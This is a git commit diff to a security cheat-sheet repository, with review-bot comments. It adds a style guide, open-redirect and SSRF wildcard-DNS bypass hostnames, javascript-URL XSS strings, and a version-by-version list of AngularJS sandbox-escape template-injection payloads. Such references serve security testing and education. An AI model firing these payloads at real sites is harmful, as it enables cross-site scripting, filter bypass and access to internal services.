Merge pull request #2 from EdOverflow/master

Syncing
Evgeniy Yakovchuk 2017-07-17 17:44:08 +03:00 committed by GitHub
commit a20e51a3ff
4 changed files with 77 additions and 16 deletions

@ -28,6 +28,16 @@ Our bug tracker utilizes several labels to help organize and identify issues.
Use the GitHub issue search — check if the issue has already been reported. Use the GitHub issue search — check if the issue has already been reported.
# Style Guide
We like to keep our Markdown files as uniform as possible. So if you submit a PR make sure to follow this style guide (We will not be angry if you do not.)
- Cheat sheet titles should start with `##`.
- Subheadings should be made bold. (`**Subheading**`)
- Add newlines after subheadings and code blocks.
- Code blocks should use three backticks. (```)
- Make sure to use syntax highlighting whenever possible.
# Contributors # Contributors
- [EdOverflow](https://github.com/EdOverflow) - [EdOverflow](https://github.com/EdOverflow)
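Review bot: the bullet `Code blocks should use three backticks. (```)` will not render as written, because three backticks inside a sentence open an inline code span that is never closed; wrap the literal in a longer code span (four backticks around the three) or just say "three backticks" without the literal. The rule that titles use `##` and subheadings are bold is the one the AngularJS heading change later in this commit follows, so the guide and the content changes agree.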

@ -7,6 +7,7 @@
``` ```
/%5cgoogle.com /%5cgoogle.com
``` ```
``` ```
//www.google.com/%2f%2e%2e //www.google.com/%2f%2e%2e
``` ```
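Review bot: neither fenced payload in this hunk says what it is for, so a reader cannot tell `/%5cgoogle.com` (an encoded backslash, which URL parsers that follow the browser rules normalise to a forward slash) from `//www.google.com/%2f%2e%2e` (a protocol-relative URL with an encoded `/..`) without decoding them; add a bold subheading or a one-line note above each block, as the new style guide asks for, rather than stacking two bare fences back to back.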

@ -29,3 +29,23 @@ http://[::1]
``` ```
http://[::] http://[::]
``` ```
**Wildcard DNS**
```
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io
```
_Link:_ http://xip.io
```
10.0.0.1.nip.io maps
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io
```
_Link:_ http://nip.io
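Review bot: `10.0.0.1.nip.io maps` on the first line of the nip.io block carries a stray word; it looks copied from nip.io's own example ("10.0.0.1.nip.io maps to 10.0.0.1"), and since the block is meant to be pasted it should read `10.0.0.1.nip.io`. One line explaining why wildcard DNS services belong in this list would also help: every `*.<ip>.xip.io` or `*.<ip>.nip.io` name resolves to the address embedded in it, so a filter that compares the hostname string against a blocklist without resolving it will accept a name that points at an internal address; the defensive check is to resolve first and then validate the resulting IP.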

@ -62,33 +62,46 @@ javas	cript://www.google.com/%0Aalert(1)
[a](javascript://www.google.com%0Aprompt(1)) [a](javascript://www.google.com%0Aprompt(1))
``` ```
## AngularJS Template Injection based XSS **AngularJS Template Injection based XSS**
**1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F) **1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
```
```js
{{constructor.constructor('alert(1)')()}} {{constructor.constructor('alert(1)')()}}
``` ```
**1.2.0 - 1.2.1** by [Jan Horn (Google)](https://twitter.com/tehjh) **1.2.0 - 1.2.1** by [Jan Horn (Google)](https://twitter.com/tehjh)
```
```js
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
``` ```
**1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
``` ```
**1.2.6 - 1.2.18** by [Jan Horn (Google)](https://twitter.com/tehjh) **1.2.6 - 1.2.18** by [Jan Horn (Google)](https://twitter.com/tehjh)
```
```js
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
``` ```
**1.2.19 - 1.2.23** by [Mathias Karlsson](https://twitter.com/avlidienbrunn) **1.2.19 - 1.2.23** by [Mathias Karlsson](https://twitter.com/avlidienbrunn)
```
```js
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
``` ```
**1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
``` ```
**1.3.0** by [Gábor Molnár (Google)](https://twitter.com/molnar_g) **1.3.0** by [Gábor Molnár (Google)](https://twitter.com/molnar_g)
``` ```
{{!ready && (ready = true) && ( {{!ready && (ready = true) && (
!call !call
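Review bot: the `1.3.0` block at the end of the hunk keeps a bare fence while every other block above it gains a `js` tag; tag it as well so the section is consistent with the new style guide's syntax-highlighting rule. The `##` to `**` change on the section title matches the guide (bold for subheadings), but it means the AngularJS payloads now sit under whatever `##` cheat sheet precedes them, so check that the preceding title is the intended XSS sheet.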
@ -105,42 +118,57 @@ javas	cript://www.google.com/%0Aalert(1)
)) ))
);}} );}}
``` ```
**1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{ {{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf; 'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//'); $eval('x=alert(1)//');
}} }}
``` ```
**1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join; 'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }} $eval('x=alert(1)//'); }}
``` ```
**1.3.19** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.19** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{ {{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//'); $eval('x=alert(1)//');
}} }}
``` ```
**1.3.20** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.20** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
``` ```
**1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
``` ```
**1.5.0 - 1.5.8** by [Ian Hickey](https://twitter.com/ianhickey1024) **1.5.0 - 1.5.8** by [Ian Hickey](https://twitter.com/ianhickey1024)
```
```js
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
``` ```
**1.5.9 - 1.5.11** by [Jan Horn (Google)](https://twitter.com/tehjh) **1.5.9 - 1.5.11** by [Jan Horn (Google)](https://twitter.com/tehjh)
```
```js
{{ {{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase; c.$apply=$apply;c.$eval=b;op=$root.$$phase;
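Review bot: tagging these blocks `js` is a reasonable choice for highlighting, but the content between `{{` and `}}` is an AngularJS expression evaluated by Angular's own expression parser, not JavaScript, which is why the entries need tricks such as replacing `charAt` with `[].join` or routing through `$eval` at all; a one-sentence note at the top of the section saying that the version ranges are inclusive and that each payload is the one that worked against that release's sandbox would explain to readers why there is exactly one entry per range.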
@ -156,7 +184,9 @@ javas	cript://www.google.com/%0Aalert(1)
$eval('a(b.c)');[].push.apply=a; $eval('a(b.c)');[].push.apply=a;
}} }}
``` ```
**1.6.0+** (no Sandbox) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F) **1.6.0+** (no Sandbox) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
```
```js
{{constructor.constructor('alert(1)')()}} {{constructor.constructor('alert(1)')()}}
``` ```
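Review bot: the `1.6.0+ (no Sandbox)` entry reuses the `1.0.1 - 1.1.5` payload verbatim, and that is the most important line in the section: from 1.6 AngularJS dropped the expression sandbox, so the simplest payload works again. Worth stating explicitly above this entry that the sandbox was never a security boundary and that the fix is to stop mixing server-side templating of user-controlled text with client-side Angular templates, not to pin a version.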